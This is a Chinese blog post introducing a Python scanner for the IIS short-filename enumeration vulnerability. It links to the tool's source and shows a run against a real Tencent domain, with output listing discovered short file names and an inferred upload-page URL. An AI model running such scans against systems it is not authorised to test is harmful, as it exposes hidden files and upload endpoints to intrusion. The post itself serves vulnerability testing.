IIS短文件名暴力枚举漏洞利用工具(IIS shortname Scanner)

本文介绍了一种针对IIS短文件名暴力枚举漏洞的扫描方法,并分享了一个Python脚本,该脚本能够检测目标URL是否受此漏洞影响,如果存在漏洞,将猜测文件夹下所有短文件名,包括文件和目录。实测表明,此脚本相较于现有工具,能够发现更多潜在的文件和目录。
摘要由CSDN通过智能技术生成

上文我已经介绍了IIS短文件名暴力枚举漏洞的成因和利用。

这里只是发出昨天写的脚本。

脚本可以测试对应的URL是否存在漏洞,若存在漏洞,则猜解文件夹下所有的短文件名:包括文件和文件名。

网上早前已经有公开的工具了:https://code.google.com/p/iis-shortname-scanner-poc/

我没有参考他的代码。自己用python实现了一个漏洞利用脚本。简单测试,发现比上面的POC能猜解到更多的文件和文件夹。

获取源代码:  https://github.com/lijiejie/IIS_shortname_Scanner   (已于Oct 27, 2016更新)

测试: IIS_shortname_Scan.py http://stom.tencent.com

最终结果:

stom-tencent-com

通过联想,就可以猜解到上传页:  http://stom.tencent.com/tapdupfile.aspx

stom-tencent-com_upfile

 

1

2

3

4

5

6

7

8

9

10

11

12

13

----------------------------------------------------------------

Dir: /aspnet~1

File: /logina~1.cs

File: /tapdap~1.cs

File: /tapdup~1.cs

File: /queryg~1.ash*

File: /queryi~1.ash*

File: /queryp~1.ash*

File: /tapdap~1.asp*

File: /tapdup~1.asp*

----------------------------------------------------------------

1 Directories, 8 Files found in total

Note that * is a wildcard, matches any character zero or more times.

 

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值